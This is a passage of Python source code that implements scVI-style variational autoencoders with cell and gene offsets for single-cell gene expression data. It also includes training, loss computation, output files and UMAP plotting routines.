trainer.model, scviDataset, indices=np.arange(len(scviDataset))
).sequential()
latent, _, _ = posterior.get_latent()
return posterior, latent, vae, trainer
# Decoder
class DecoderSCVI(nn.Module):
"""Decodes data from latent space of ``n_input`` dimensions ``n_output``
dimensions using a fully-connected neural network of ``n_hidden`` layers.
Parameters
----------
n_input
The dimensionality of the input (latent space)
n_output
The dimensionality of the output (data space)
n_cat_list
A list containing the number of categories
for each category of interest. Each category will be
included using a one-hot encoding
n_layers
The number of fully-connected hidden layers
n_hidden
The number of nodes per hidden layer
dropout_rate
Dropout rate to apply to each of the hidden layers
Returns
-------
"""
def __init__(
self,
n_input: int,
n_output: int,
n_cat_list: Iterable[int] = None,
n_layers: int = 1,
n_hidden: int = 128,
):
super().__init__()
self.px_decoder = FCLayers(
n_in=n_input,
n_out=n_hidden,
n_cat_list=n_cat_list,
n_layers=n_layers,
n_hidden=n_hidden,
dropout_rate=0,
)
# mean gamma
self.px_scale_decoder = nn.Sequential(
nn.Linear(n_hidden, n_output), nn.Softmax(dim=-1)
)
# dispersion: here we only deal with gene-cell dispersion case
self.px_r_decoder = nn.Linear(n_hidden, n_output)
# dropout
self.px_dropout_decoder = nn.Linear(n_hidden, n_output)
def forward(
self, dispersion: str, z: torch.Tensor, library: torch.Tensor, *cat_list: int
):
"""The forward computation for a single sample.
#. Decodes the data from the latent space using the decoder network
#. Returns parameters for the ZINB distribution of expression
#. If ``dispersion != 'gene-cell'`` then value for that param will be ``None``
Parameters
----------
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
z :
tensor with shape ``(n_input,)``
library
library size
cat_list
list of category membership(s) for this sample
Returns
-------
4-tuple of :py:class:`torch.Tensor`
parameters for the ZINB distribution of expression
"""
# The decoder returns values for the parameters of the ZINB distribution
px = self.px_decoder(z, *cat_list)
px_scale = self.px_scale_decoder(px)
px_dropout = self.px_dropout_decoder(px)
# Clamp to high value: exp(12) ~ 160000 to avoid nans (computational stability)
px_rate = (torch.exp(library)) * px_scale # torch.clamp( , max=12)
px_r = self.px_r_decoder(px) if dispersion == "gene-cell" else None
return px_scale, px_r, px_rate, px_dropout
## Modifications from scVI code marked with '################ ===>'
class DecoderSCVIGeneCell(DecoderSCVI):
"""Decodes data from latent space of ``n_input`` dimensions ``n_output``
dimensions using a fully-connected neural network of ``n_hidden`` layers.
Parameters
----------
n_input
The dimensionality of the input (latent space)
n_output
The dimensionality of the output (data space)
n_cat_list
A list containing the number of categories
for each category of interest. Each category will be
included using a one-hot encoding
n_layers
The number of fully-connected hidden layers
n_hidden
The number of nodes per hidden layer
dropout_rate
Dropout rate to apply to each of the hidden layers
Returns
-------
"""
def __init__(
self,
n_input: int,
n_output: int,
n_cat_list: Iterable[int] = None,
n_layers: int = 1,
n_hidden: int = 128,
):
super().__init__(n_input, n_output, n_cat_list, n_layers, n_hidden)
def forward(
self,
dispersion: str,
z: torch.Tensor,
library: torch.Tensor,
*cat_list: int,
cell_offset: torch.Tensor,
gene_offset: torch.Tensor,
dispersion_clamp: list,
):
"""The forward computation for a single sample.
#. Decodes the data from the latent space using the decoder network
#. Returns parameters for the ZINB distribution of expression
#. If ``dispersion != 'gene-cell'`` then value for that param will be ``None``
Parameters
----------
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
z :
tensor with shape ``(n_input,)``
library
library size
cat_list
list of category membership(s) for this sample
Returns
-------
4-tuple of :py:class:`torch.Tensor`
parameters for the ZINB distribution of expression
"""
# The decoder returns values for the parameters of the ZINB distribution
px = self.px_decoder(z, *cat_list)
px_scale = self.px_scale_decoder(px)
px_dropout = self.px_dropout_decoder(px)
# Clamp to high value: exp(12) ~ 160000 to avoid nans (computational stability
################ ===>
cell_offset = torch.reshape(cell_offset, (cell_offset.shape[0], 1))
px_rate = (
(torch.exp(library) * (cell_offset)) * px_scale * gene_offset
) # torch.clamp( , max=12)
px_rate = (
(torch.exp(library) * (cell_offset)) * px_scale * gene_offset
) # torch.clamp( , max=12)
# px_rate = cell_offset #torch.exp(library) + cell_mean * px_scale # torch.clamp( , max=12)
# px_rate = torch.exp(library + cell_mean) * px_scale # torch.clamp( , max=12)
px_r = self.px_r_decoder(px) if dispersion == "gene-cell" else None
if dispersion == "gene-cell" and dispersion_clamp:
px_r = torch.clamp(px_r, min=dispersion_clamp[0], max=dispersion_clamp[1])
return px_scale, px_r, px_rate, px_dropout
class LinearDecoderSCVIGeneCell(nn.Module):
def __init__(
self,
n_input: int,
n_output: int,
n_cat_list: Iterable[int] = None,
use_batch_norm: bool = True,
bias: bool = False,
):
super(LinearDecoderSCVIGeneCell, self).__init__()
# mean gamma
self.factor_regressor = FCLayers(
n_in=n_input,
n_out=n_output,
n_cat_list=n_cat_list,
n_layers=1,
use_relu=False,
use_batch_norm=use_batch_norm,
bias=bias,
dropout_rate=0,
)
# dropout
self.px_dropout_decoder = FCLayers(
n_in=n_input,
n_out=n_output,
n_cat_list=n_cat_list,
n_layers=1,
use_relu=False,
use_batch_norm=use_batch_norm,
bias=bias,
dropout_rate=0,
)
def forward(
self,
dispersion: str,
z: torch.Tensor,
library: torch.Tensor,
*cat_list: int,
cell_offset: torch.Tensor,
gene_offset: torch.Tensor,
):
# The decoder returns values for the parameters of the ZINB distribution
raw_px_scale = self.factor_regressor(z, *cat_list)
px_scale = torch.softmax(raw_px_scale, dim=-1)
px_dropout = self.px_dropout_decoder(z, *cat_list)
##px_rate = torch.exp(library) * px_scale
################ ===>
cell_offset = torch.reshape(cell_offset, (cell_offset.shape[0], 1))
px_rate = (
(torch.exp(library) * cell_offset) * px_scale * gene_offset
) # torch.clamp( , max=12)
px_r = None
return px_scale, px_r, px_rate, px_dropout
# VAEGeneCell model
class VAEGeneCell(nn.Module):
"""Variational auto-encoder model.
This is an implementation of the scVI model descibed in [Lopez18]_
Parameters
----------
n_input
Number of input genes
n_batch
Number of batches, if 0, no batch correction is performed.
n_labels
Number of labels
n_hidden
Number of nodes per hidden layer
n_latent
Dimensionality of the latent space
n_layers
Number of hidden layers used for encoder and decoder NNs
dropout_rate
Dropout rate for neural networks
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
log_variational
Log(data+1) prior to encoding for numerical stability. Not normalization.
reconstruction_loss
One of
* ``'nb'`` - Negative binomial distribution
* ``'zinb'`` - Zero-inflated negative binomial distribution
* ``'poisson'`` - Poisson distribution
Examples
--------
>>> gene_dataset = CortexDataset()
>>> vae = VAE(gene_dataset.nb_genes, n_batch=gene_dataset.n_batches * False,
... n_labels=gene_dataset.n_labels)
"""
def __init__(
self,
n_input: int,
n_batch: int = 0,
n_labels: int = 0,
n_hidden: int = 128,
n_latent: int = 10,
n_layers: int = 1,
dropout_rate: float = 0.1,
dispersion: str = "gene",
log_variational: bool = True,
reconstruction_loss: str = "zinb",
latent_distribution: str = "normal",
cell_offset: str = "none", ################ ===>
gene_offset: str = "none", ################ ===>
dispersion_clamp: list = [],
beta_disentanglement: float = 1.0,
kl_type: str = "reverse",
):
super().__init__()
self.dispersion = dispersion
self.n_latent = n_latent
self.log_variational = log_variational
self.reconstruction_loss = reconstruction_loss
# Automatically deactivate if useless
self.n_batch = n_batch
self.n_labels = n_labels
self.latent_distribution = latent_distribution
################ ===>
self.cell_offset = cell_offset
self.gene_offset = gene_offset
self.dispersion_clamp = dispersion_clamp
self.beta_disentanglement = beta_disentanglement
self.kl_type = kl_type
if self.dispersion == "gene":
self.px_r = torch.nn.Parameter(torch.randn(n_input))
elif self.dispersion == "gene-batch":
self.px_r = torch.nn.Parameter(torch.randn(n_input, n_batch))
elif self.dispersion == "gene-label":
self.px_r = torch.nn.Parameter(torch.randn(n_input, n_labels))
elif self.dispersion == "gene-cell":
pass
else:
raise ValueError(
"dispersion must be one of ['gene', 'gene-batch',"
" 'gene-label', 'gene-cell'], but input was "
"{}.format(self.dispersion)"
)
# z encoder goes from the n_input-dimensional data to an n_latent-d
# latent space representation
self.z_encoder = Encoder(
n_input,
n_latent,
n_layers=n_layers,
n_hidden=n_hidden,
dropout_rate=dropout_rate,
distribution=latent_distribution,
)
# l encoder goes from n_input-dimensional data to 1-d library size
self.l_encoder = Encoder(
n_input, 1, n_layers=1, n_hidden=n_hidden, dropout_rate=dropout_rate
)
# decoder goes from n_latent-dimensional space to n_input-d data
################ ===>
self.decoder = DecoderSCVIGeneCell(
n_latent,
n_input,
n_cat_list=[n_batch],
n_layers=n_layers,
n_hidden=n_hidden,
)
def get_latents(self, x, y=None) -> torch.Tensor:
"""Returns the result of ``sample_from_posterior_z`` inside a list
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
Returns
-------
type
one element list of tensor
"""
return [self.sample_from_posterior_z(x, y)]
def sample_from_posterior_z(
self, x, y=None, give_mean=False, n_samples=5000
) -> torch.Tensor:
"""Samples the tensor of latent values from the posterior
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
give_mean
is True when we want the mean of the posterior distribution rather than sampling (Default value = False)
n_samples
how many MC samples to average over for transformed mean (Default value = 5000)
Returns
-------
type
tensor of shape ``(batch_size, n_latent)``
"""
if self.log_variational:
x = torch.log(1 + x)
qz_m, qz_v, z = self.z_encoder(x, y) # y only used in VAEC
if give_mean:
if self.latent_distribution == "ln":
samples = Normal(qz_m, qz_v.sqrt()).sample([n_samples])
z = self.z_encoder.z_transformation(samples)
z = z.mean(dim=0)
else:
z = qz_m
return z
def sample_from_posterior_l(self, x) -> torch.Tensor:
"""Samples the tensor of library sizes from the posterior
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)``
Returns
-------
type
tensor of shape ``(batch_size, 1)``
"""
if self.log_variational:
x = torch.log(1 + x)
ql_m, ql_v, library = self.l_encoder(x)
return library
def get_sample_scale(
self, x, batch_index=None, y=None, n_samples=1, transform_batch=None
) -> torch.Tensor:
"""Returns the tensor of predicted frequencies of expression
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
batch_index
array that indicates which batch the cells belong to with shape ``batch_size`` (Default value = None)
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
n_samples
number of samples (Default value = 1)
transform_batch
int of batch to transform samples into (Default value = None)
Returns
-------
type
tensor of predicted frequencies of expression with shape ``(batch_size, n_input)``
"""
return self.inference(
x,
batch_index=batch_index,
y=y,
n_samples=n_samples,
transform_batch=transform_batch,
)["px_scale"]
def get_sample_rate(
self, x, batch_index=None, y=None, n_samples=1, transform_batch=None
) -> torch.Tensor:
"""Returns the tensor of means of the negative binomial distribution
Parameters
----------
x
tensor of values with shape ``(batch_size, n_input)``
y
tensor of cell-types labels with shape ``(batch_size, n_labels)`` (Default value = None)
batch_index
array that indicates which batch the cells belong to with shape ``batch_size`` (Default value = None)
n_samples
number of samples (Default value = 1)
transform_batch
int of batch to transform samples into (Default value = None)
Returns
-------
type
tensor of means of the negative binomial distribution with shape ``(batch_size, n_input)``
"""
return self.inference(
x,
batch_index=batch_index,
y=y,
n_samples=n_samples,
transform_batch=transform_batch,
)["px_rate"]
def get_reconstruction_loss(
self, x, px_rate, px_r, px_dropout, **kwargs
) -> torch.Tensor:
# Reconstruction Loss
px_rate_ = px_rate
if self.reconstruction_loss == "zinb":
reconst_loss = (
-ZeroInflatedNegativeBinomial(
mu=px_rate_, theta=px_r, zi_logits=px_dropout
)
.log_prob(x)
.sum(dim=-1)
)
elif self.reconstruction_loss == "nb":
reconst_loss = (
-NegativeBinomial(mu=px_rate_, theta=px_r).log_prob(x).sum(dim=-1)
)
elif self.reconstruction_loss == "poisson":
reconst_loss = -Poisson(px_rate_).log_prob(x).sum(dim=-1)
return reconst_loss
def inference(
self, x, batch_index=None, y=None, n_samples=1, transform_batch=None, **kwargs
) -> Dict[str, torch.Tensor]:
"""Helper function used in forward pass"""
x_ = x
if self.log_variational:
x_ = torch.log(1 + x_)
# Sampling
qz_m, qz_v, z = self.z_encoder(x_, y)
ql_m, ql_v, library = self.l_encoder(x_)
if n_samples > 1:
qz_m = qz_m.unsqueeze(0).expand((n_samples, qz_m.size(0), qz_m.size(1)))
qz_v = qz_v.unsqueeze(0).expand((n_samples, qz_v.size(0), qz_v.size(1)))
# when z is normal, untran_z == z
untran_z = Normal(qz_m, qz_v.sqrt()).sample()
z = self.z_encoder.z_transformation(untran_z)
ql_m = ql_m.unsqueeze(0).expand((n_samples, ql_m.size(0), ql_m.size(1)))
ql_v = ql_v.unsqueeze(0).expand((n_samples, ql_v.size(0), ql_v.size(1)))
library = Normal(ql_m, ql_v.sqrt()).sample()
if transform_batch is not None:
dec_batch_index = transform_batch * torch.ones_like(batch_index)
else:
dec_batch_index = batch_index
################ ===>
try: # if use_cuda:
cell_offset = torch.ones(x.shape[0]).to(torch.cuda.current_device())
gene_offset = torch.ones(x.shape[1]).to(torch.cuda.current_device())
except:
cell_offset = torch.ones(x.shape[0])
gene_offset = torch.ones(x.shape[1])
if self.cell_offset == "count":
cell_offset = torch.sum(x, dim=1)
elif self.cell_offset == "mean":
cell_offset = torch.mean(x, dim=1)
if self.gene_offset == "count":
gene_offset = torch.sum(x, dim=0)
elif self.gene_offset == "mean":
gene_offset = torch.mean(x, dim=0)
px_scale, px_r, px_rate, px_dropout = self.decoder(
self.dispersion,
z,
library,
dec_batch_index,
y,
cell_offset=cell_offset, ################ ===>
gene_offset=gene_offset, ################ ===>
dispersion_clamp=self.dispersion_clamp,
)
if self.dispersion == "gene-label":
px_r = F.linear(
one_hot(y, self.n_labels), self.px_r
) # px_r gets transposed - last dimension is nb genes
elif self.dispersion == "gene-batch":
px_r = F.linear(one_hot(dec_batch_index, self.n_batch), self.px_r)
elif self.dispersion == "gene":
px_r = self.px_r
px_r = torch.exp(px_r)
return dict(
px_scale=px_scale,
px_r=px_r,
px_rate=px_rate,
px_dropout=px_dropout,
qz_m=qz_m,
qz_v=qz_v,
z=z,
ql_m=ql_m,
ql_v=ql_v,
library=library,
)
def forward(
self, x, local_l_mean, local_l_var, batch_index=None, y=None
) -> Tuple[torch.Tensor, torch.Tensor]:
"""Returns the reconstruction loss and the KL divergences
Parameters
----------
x
tensor of values with shape (batch_size, n_input)
local_l_mean
tensor of means of the prior distribution of latent variable l
with shape (batch_size, 1)
local_l_var
tensor of variancess of the prior distribution of latent variable l
with shape (batch_size, 1)
batch_index
array that indicates which batch the cells belong to with shape ``batch_size`` (Default value = None)
y
tensor of cell-types labels with shape (batch_size, n_labels) (Default value = None)
Returns
-------
type
the reconstruction loss and the Kullback divergences
"""
# Parameters for z latent distribution
outputs = self.inference(x, batch_index, y)
qz_m = outputs["qz_m"]
qz_v = outputs["qz_v"]
ql_m = outputs["ql_m"]
ql_v = outputs["ql_v"]
px_rate = outputs["px_rate"]
px_r = outputs["px_r"]
px_dropout = outputs["px_dropout"]
# KL Divergence
mean = torch.zeros_like(qz_m)
scale = torch.ones_like(qz_v)
# only use it on mean
if self.kl_type == "reverse":
kl_divergence_z = kl(
Normal(qz_m, torch.sqrt(qz_v)), Normal(mean, scale)
).sum(dim=1)
elif self.kl_type == "forward":
kl_divergence_z = kl(
Normal(mean, scale), Normal(qz_m, torch.sqrt(qz_v))
).sum(dim=1)
elif self.kl_type == "symmetric":
p_sum_q = Normal(mean + qz_m, scale + torch.sqrt(qz_v))
kl_divergence_z_f = kl(Normal(mean, scale), p_sum_q).sum(dim=1)
kl_divergence_z_r = kl(Normal(qz_m, torch.sqrt(qz_v)), p_sum_q).sum(dim=1)
kl_divergence_z = 0.5 * (kl_divergence_z_f + kl_divergence_z_r)
kl_divergence_l = kl(
Normal(ql_m, torch.sqrt(ql_v)),
Normal(local_l_mean, torch.sqrt(local_l_var)),
).sum(dim=1)
kl_divergence = kl_divergence_z * self.beta_disentanglement
reconst_loss = self.get_reconstruction_loss(
x,
px_rate,
px_r,
px_dropout,
)
return reconst_loss + kl_divergence_l, kl_divergence, 0.0
class LDVAEGeneCell(VAEGeneCell):
"""Linear-decoded Variational auto-encoder model.
Implementation of [Svensson20]_.
This model uses a linear decoder, directly mapping the latent representation
to gene expression levels. It still uses a deep neural network to encode
the latent representation.
Compared to standard VAE, this model is less powerful, but can be used to
inspect which genes contribute to variation in the dataset. It may also be used
for all scVI tasks, like differential expression, batch correction, imputation, etc.
However, batch correction may be less powerful as it assumes a linear model.
Parameters
----------
n_input
Number of input genes
n_batch
Number of batches
n_labels
Number of labels
n_hidden
Number of nodes per hidden layer (for encoder)
n_latent
Dimensionality of the latent space
n_layers_encoder
Number of hidden layers used for encoder NNs
dropout_rate
Dropout rate for neural networks
dispersion
One of the following
* ``'gene'`` - dispersion parameter of NB is constant per gene across cells
* ``'gene-batch'`` - dispersion can differ between different batches
* ``'gene-label'`` - dispersion can differ between different labels
* ``'gene-cell'`` - dispersion can differ for every gene in every cell
log_variational
Log(data+1) prior to encoding for numerical stability. Not normalization.
reconstruction_loss
One of
* ``'nb'`` - Negative binomial distribution
* ``'zinb'`` - Zero-inflated negative binomial distribution
use_batch_norm
Bool whether to use batch norm in decoder
bias
Bool whether to have bias term in linear decoder
"""
def __init__(
self,
n_input: int,
n_batch: int = 0,
n_labels: int = 0,
n_hidden: int = 128,
n_latent: int = 10,
n_layers_encoder: int = 1,
dropout_rate: float = 0.1,
dispersion: str = "gene",
log_variational: bool = True,
reconstruction_loss: str = "nb",
use_batch_norm: bool = True,
bias: bool = False,
latent_distribution: str = "normal",
cell_offset: str = "none",
gene_offset: str = "none",
):
super().__init__(
n_input,
n_batch,
n_labels,
n_hidden,
n_latent,
n_layers_encoder,
dropout_rate,
dispersion,
log_variational,
reconstruction_loss,
latent_distribution,
cell_offset, ################ ===>
gene_offset, ################ ===>
)
self.use_batch_norm = use_batch_norm
self.z_encoder = Encoder(
n_input,
n_latent,
n_layers=n_layers_encoder,
n_hidden=n_hidden,
dropout_rate=dropout_rate,
distribution=latent_distribution,
)
################ ===>
self.decoder = LinearDecoderSCVIGeneCell(
n_latent,
n_input,
n_cat_list=[n_batch],
use_batch_norm=use_batch_norm,
bias=bias,
)
@torch.no_grad()
def get_loadings(self) -> np.ndarray:
"""Extract per-gene weights (for each Z, shape is genes by dim(Z)) in the linear decoder."""
# This is BW, where B is diag(b) batch norm, W is weight matrix
if self.use_batch_norm is True:
w = self.decoder.factor_regressor.fc_layers[0][0].weight
bn = self.decoder.factor_regressor.fc_layers[0][1]
sigma = torch.sqrt(bn.running_var + bn.eps)
gamma = bn.weight
b = gamma / sigma
bI = torch.diag(b)
loadings = torch.matmul(bI, w)
else:
loadings = self.decoder.factor_regressor.fc_layers[0][0].weight
loadings = loadings.detach().cpu().numpy()
if self.n_batch > 1:
loadings = loadings[:, : -self.n_batch]
return loadings
def compute_scvi_latent(
adata: sc.AnnData,
n_latent: int = 50,
n_encoder: int = 1,
n_epochs: int = 200,
lr: float = 1e-3,
use_batches: bool = False,
use_cuda: bool = False,
linear: bool = False,
cell_offset: str = "none",
gene_offset: str = "none",
ldvae_bias: bool = False,
reconstruction_loss: str = "zinb",
dispersion: str = "gene",
hvg_genes="all",
point_size=10,
dispersion_clamp=[],
beta_disentanglement=1.0,
kl_type="reverse",
) -> Tuple[scvi.inference.Posterior, np.ndarray]:
"""Train and return a scVI model and sample a latent space
:param adata: sc.AnnData object non-normalized
:param n_latent: dimension of the latent space
:param n_epochs: number of training epochs
:param lr: learning rate
:param use_batches
:param use_cuda
:return: (scvi.Posterior, latent_space)
"""
# Convert easily to scvi dataset
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
if isinstance(scviDataset.X, np.ndarray):
X = scviDataset.X
else:
X = scviDataset.X.toarray()
# Train a model
if not linear:
vae = VAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
reconstruction_loss=reconstruction_loss,
dispersion=dispersion,
dispersion_clamp=dispersion_clamp,
beta_disentanglement=beta_disentanglement,
kl_type=kl_type,
)
else:
vae = LDVAEGeneCell(
scviDataset.nb_genes,
n_batch=scviDataset.n_batches * use_batches,
n_latent=n_latent,
n_layers_encoder=n_encoder,
cell_offset=cell_offset,
gene_offset=gene_offset,
bias=ldvae_bias,
reconstruction_loss=reconstruction_loss,
dispersion=dispersion,
)
trainer = UnsupervisedTrainer(vae, scviDataset, train_size=1.0, use_cuda=use_cuda)
trainer.train(n_epochs=n_epochs, lr=lr)
# Extract latent space
posterior = trainer.create_posterior(
trainer.model, scviDataset, indices=np.arange(len(scviDataset))
).sequential()
latent, _, _ = posterior.get_latent()
return posterior, latent, vae, trainer
def RunVAE(
adata,
reconstruction_loss,
n_latent=30,
n_encoder=1,
linear=False,
cell_offset="none",
gene_offset="none",
ldvae=False,
ldvae_bias=False,
title_prefix="",
dispersion="gene",
hvg_genes="all",
point_size=5,
n_epochs=200,
lr=1e-3,
batch_size=1000,
use_cuda=False,
legend_loc="on data",
figsize=(10, 5),
legend_fontweight="normal",
sct_cell_pars=None,
outdir=None,
sct_gene_pars=None,
sct_model_pars_fit=None,
dispersion_clamp=[],
beta_disentanglement=1.0,
kl_type="reverse",
):
sct_gene_pars_df = pd.read_csv(sct_gene_pars, sep="\t", index_col=0)
sct_model_pars_fit_df = pd.read_csv(sct_model_pars_fit, sep="\t", index_col=0)
sct_model_paras_withgmean = sct_model_pars_fit_df.join(sct_gene_pars_df)
scvi_posterior, scvi_latent, scvi_vae, scvi_trainer = compute_scvi_latent(
adata,
n_encoder=n_encoder,
n_epochs=n_epochs,
n_latent=n_latent,
use_cuda=use_cuda,
linear=linear,
cell_offset=cell_offset,
gene_offset=gene_offset,
reconstruction_loss=reconstruction_loss,
dispersion=dispersion,
hvg_genes=hvg_genes,
dispersion_clamp=dispersion_clamp,
beta_disentanglement=beta_disentanglement,
kl_type=kl_type,
)
suffix = "_{}_{}_{}_{}".format(
cell_offset, gene_offset, reconstruction_loss, dispersion
)
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
# posterior freq of genes per cell
# scale = scvi_posterior.sequential(batch_size=batch_size).get_sample_scale()
# scale = scale.detach()
scale = scvi_posterior.get_sample_scale()
# batch_size=batch_size
for _ in range(99):
scale += scvi_posterior.get_sample_scale()
scale /= 100
scale_df = pd.DataFrame(scale)
scale_df.index = list(adata.obs_names)
scale_df.columns = list(scviDataset.gene_ids)
scale_df = scale_df.T
scvi_latent_df = pd.DataFrame(scvi_latent)
scvi_latent_df.index = list(adata.obs_names)
if outdir:
os.makedirs(outdir, exist_ok=True)
scale_df.to_csv(
os.path.join(outdir, "SCVI_scale_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
scvi_latent_df.to_csv(
os.path.join(outdir, "SCVI_latent_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
adata.obsm["X_scvi"] = scvi_latent
for gene, gene_scale in zip(adata.var.index, np.squeeze(scale).T):
adata.obs["scale_" + gene] = gene_scale
sc.pp.neighbors(adata, use_rep="X_scvi", n_neighbors=20, n_pcs=30)
sc.tl.umap(adata, min_dist=0.3)
sc.tl.leiden(adata, key_added="X_scvi", resolution=0.8)
X_umap = adata.obsm["X_umap"]
X_umap_df = pd.DataFrame(X_umap)
X_umap_df.index = list(adata.obs_names)
if outdir:
X_umap_df.to_csv(
os.path.join(outdir, "SCVI_Xumap_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
scviDataset = AnnDatasetFromAnnData(adata)
if isinstance(hvg_genes, int):
scviDataset.subsample_genes(hvg_genes)
if isinstance(scviDataset.X, np.ndarray):
X = scviDataset.X
else:
X = scviDataset.X.toarray()
try:
X = torch.from_numpy(X).float().to(torch.cuda.current_device())
batch = torch.from_numpy(scviDataset.batch_indices.astype(float)).to(
torch.cuda.current_device()
)
except:
X = torch.from_numpy(X).float()
batch = torch.from_numpy(scviDataset.batch_indices.astype(float))
inference = scvi_vae.inference(X, batch)
# torch.cuda.empty_cache()
if reconstruction_loss == "nb":
reconst_loss = log_nb_positive(
X,
inference["px_rate"],
inference["px_r"],
inference["px_dropout"],
)
elif reconstruction_loss == "zinb":
reconst_loss = log_zinb_positive(
X,
inference["px_rate"],
inference["px_r"],
inference["px_dropout"],
)
gene_loss = np.nansum(reconst_loss.detach().cpu().numpy(), axis=0)
cell_loss = np.nansum(reconst_loss.detach().cpu().numpy(), axis=1)
gene_mean = np.array(adata[:, scviDataset.gene_names].X.mean(0))[0]
if not gene_mean.shape:
# TODO: need to handle this more gracefully
gene_mean = np.array(adata[:, scviDataset.gene_names].X.mean(0))
cell_mean = np.array(adata[:, scviDataset.gene_names].X.mean(1)).flatten()
fig1 = plt.figure(figsize=figsize)
ax = fig1.add_subplot(121)
ax.scatter(
gene_mean, gene_loss, label="Gene", alpha=0.5, color="black", s=point_size
)
gene_loss_df = pd.DataFrame([gene_mean, gene_loss])
gene_loss_df = gene_loss_df.T
gene_loss_df.index = list(scviDataset.gene_names)
gene_loss_df.columns = ["gene_mean", "gene_loss"]
cell_loss_df = pd.DataFrame([cell_mean, cell_loss])
cell_loss_df = cell_loss_df.T
cell_loss_df.index = list(adata.obs_names)
cell_loss_df.columns = ["cell_mean", "cell_loss"]
if outdir:
gene_loss_df.to_csv(
os.path.join(outdir, "SCVI_geneloss_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
cell_loss_df.to_csv(
os.path.join(outdir, "SCVI_cellloss_df_{}.tsv".format(suffix)),
sep="\t",
index=True,
header=True,
)
ax.set_xlabel("Mean counts")
ax.set_ylabel("Reconstuction loss")
ax.legend(scatterpoints=1)
ax = fig1.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
legend_fontweight=legend_fontweight,
ax=ax,
size=point_size,
legend_loc=legend_loc,
)
title = "{} | Genewise | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig1.suptitle(title)
fig1.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
os.makedirs(outdir, exist_ok=True)
fig1.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig1.savefig(os.path.join(outdir, "{}.png".format(title)))
fig2 = plt.figure(figsize=figsize)
ax = fig2.add_subplot(121)
ax.scatter(cell_mean, cell_loss, label="Cell", alpha=0.5, s=point_size)
ax.set_xlabel("Mean counts")
ax.set_ylabel("Reconstuction loss")
ax.legend(scatterpoints=1)
ax = fig2.add_subplot(122)
sc.pl.umap(
adata,
color="named_clusters",
show=False,
ax=ax,
legend_loc=legend_loc,
legend_fontweight=legend_fontweight,
size=point_size,
)
title = "{} | Cellwise | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
fig2.suptitle(title)
fig2.tight_layout(rect=[0, 0.03, 1, 0.95])
title = title.replace(" ", "").replace("=", "_")
if outdir:
fig2.savefig(os.path.join(outdir, "{}.pdf".format(title)))
fig2.savefig(os.path.join(outdir, "{}.png".format(title)))
if outdir:
model_name = "{} | Posterior | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
# scVI explicitly asks this path to be empty
shutil.rmtree(
os.path.join(outdir, model_name.replace(" ", "") + ".posterior"),
ignore_errors=True,
)
scvi_posterior.save_posterior(
os.path.join(outdir, model_name.replace(" ", "") + ".posterior")
)
if sct_cell_pars is None:
fig1.show()
fig2.show()
obj_to_return = (
scvi_posterior,
scvi_latent,
scvi_vae,
scvi_trainer,
fig1,
fig2,
None,
)
titles_to_return = (
"posterior",
"latent",
"vae",
"trainer",
"cellwise_plot",
"genewise_plot",
"libsize_plot",
)
return dict(zip(titles_to_return, obj_to_return))
title = "{} | Libsize | disp:{} | loss:{} | ldvae:{}({}) | n_enc:{} | c_ofst:{} | g_ofst:{}".format(
title_prefix,
dispersion,
reconstruction_loss,
ldvae,
ldvae_bias,
n_encoder,
cell_offset,
gene_offset,
)
library_sizes = pd.DataFrame(scvi_posterior.get_stats())
sct_library_sizes = pd.read_csv(sct_cell_pars, sep="\t")
library_sizes.index = adata.obs_names
library_sizes.columns = ["scvi_libsize"]
library_sizes["scvi_loglibsize"] = np.log10(library_sizes["scvi_libsize"])
library_size_df = library_sizes.join(sct_library_sizes)
fig3 = plt.figure(figsize=(10, 5))
ax = fig3.add_subplot(121)
ax.scatter(
library_size_df["log_umi"],
library_size_df["scvi_libsize"],
alpha=0.5,
s=point_size,
)
ax.set_xlabel("log_umi")
ax.set_ylabel("scvi_libsize")
ax = fig3.add_subplot(122)
sc.pl.umap(
adata,
